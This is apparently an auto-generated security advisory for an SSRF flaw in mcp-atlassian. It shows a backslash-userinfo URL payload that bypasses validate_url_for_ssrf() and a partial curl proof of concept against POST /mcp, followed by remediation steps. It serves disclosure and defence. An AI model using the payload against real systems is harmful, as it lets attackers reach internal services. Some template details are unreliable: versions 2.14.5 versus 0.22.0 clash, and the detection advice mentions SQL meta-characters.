CVE-2026-77274 high CVSS 8.2

SSRF (Server-Side Request Forgery) in mcp-atlassian (CVE-2026-77274)

Summary

SSRF in mcp-atlassian (CVE-2026-77274). Confidential information can be exposed externally. Exploitable via POST /mcp. Mitigation: upgrade to 0.22.0 or later.

Original description

The description as published by the source.

Environment

  • Project: sooperset/mcp-atlassian
  • Affected function: validate_url_for_ssrf()
  • Affected path: header-based Jira/Confluence URL authentication flow
  • Tested endpoint: POST /mcp
  • Tested version: 2.14.5

Description

The SSRF protection in validate_url_for_ssrf() can be bypassed with a URL containing a backslash before userinfo-like syntax.

Affected code:

parsed = urlparse(url)
hostname = parsed.hostname
...
ip_error = _check_ip_address(hostname)
...
dns_error = _check_dns_resolution(hostname)

Payload:

http://127.0.0.1:6666\@www.baidu.com

For this input, urllib.parse.urlparse() treats the hostname as:

www.baidu.com

Therefore, validate_url_for_ssrf() validates www.baidu.com instead of 127.0.0.1. However, the downstream request made through the Atlassian client / requests.Session reaches the local service:

http://127.0.0.1:6666/%5C@www.baidu.com/rest/api/2/myself

This allows an attacker-controlled Jira URL to target loopback or internal services.

Proof of Concept

Start a local HTTP server:

python3 -m http.server 6666 --bind 127.0.0.1

Start mcp-atlassian with streamable HTTP transport on port 9000.

Initialize an MCP session with the malicious Jira URL:

curl -i http://127.0.0.1:9000/mcp \
  -H 'Content-Type: application/json' \
  -H 'Accept: application/json, text/event-stream' \
  -H 'X-Atlassian-Jira-Url: http://127.0.0.1:6666\@www.baidu.com' \
  -…

CVE-2026-77274 (mcp-atlassian) — CWE-918 / CVSS v3 8.2
Attack vector: remote (network-reachable) / unauthenticated / no user interaction
Attack surface: POST /mcp / www.baidu.com / requests.Session / parsed.hostname
Patched: 0.22.0 — apply immediately
Plan: 1) Audit SBOM/dependencies, 2) Stage→prod upgrade, 3) Add WAF/proxy monitoring on affected endpoints, 4) Hunt IOCs in logs.
Refs: see the GHSA / vendor advisory / patched release linked on this page.

❓ What is the problem

SSRF (CWE-918) exists in mcp-atlassian. Attackers reach the vulnerable code path via POST /mcp without authentication.

📍 Affected scope

Check the vendor advisory for the affected versions of mcp-atlassian. Attack surface: POST /mcp / www.baidu.com / requests.Session / parsed.hostname.

🔥 Severity

Severity: High (CVSS 8.2/10). Confidential information can be exposed externally.

🔧 How to fix

Update to 0.22.0.

🛡️ Workaround

Until the patch is applied: disable the affected feature, apply WAF rules, or restrict access via network ACLs.

🔍 Detection

Search webserver/proxy logs for unusual POST /mcp requests with malformed payloads or SQL meta-characters. Run grep -r 'mcp-atlassian' . against your dependency files (package-lock.json, requirements.txt, go.sum) to find affected services.

Response actions

Concrete steps and command examples for SOC/SRE teams to execute in order

  1. 1
    Identify exposure identify
    grep -r 'mcp-atlassian' . | grep -v node_modules

    リポジトリと本番環境の依存ファイル (package-lock.json / requirements.txt / go.sum / Gemfile.lock 等) で mcp-atlassian を grep し、稼働しているサービス・バージョンを把握する。

  2. 2
    Hunt for indicators of compromise detect
    grep 'POST /mcp' /var/log/nginx/access.log | grep -E '(unusual_payload|sqli_pattern)'

    アクセスログで POST /mcp への異常なリクエスト (不正な認証ヘッダ・SQLメタ文字)を過去 30〜90日分捜索。WAF/SIEM があれば該当パスのアラート発火履歴を確認。

  3. 3
    Apply patch patch
    Upgrade mcp-atlassian to 0.22.0

    ステージング環境で 0.22.0 に上げて回帰テスト → 本番反映。回帰テストはアプリの主要ハッピーパスと、Step 2 で見つけた異常検知の続報チェックを含めること。

  4. 4
    Post-deployment verification verify
    Replay attack against POST /mcp on staging to confirm patch closes the vector

    パッチ適用後、ステージングで PoC または同等の悪用パターンを再現して脆弱性が閉じたことを確認。本番では Step 2 と同じログクエリでアラート再発が無いか継続監視。
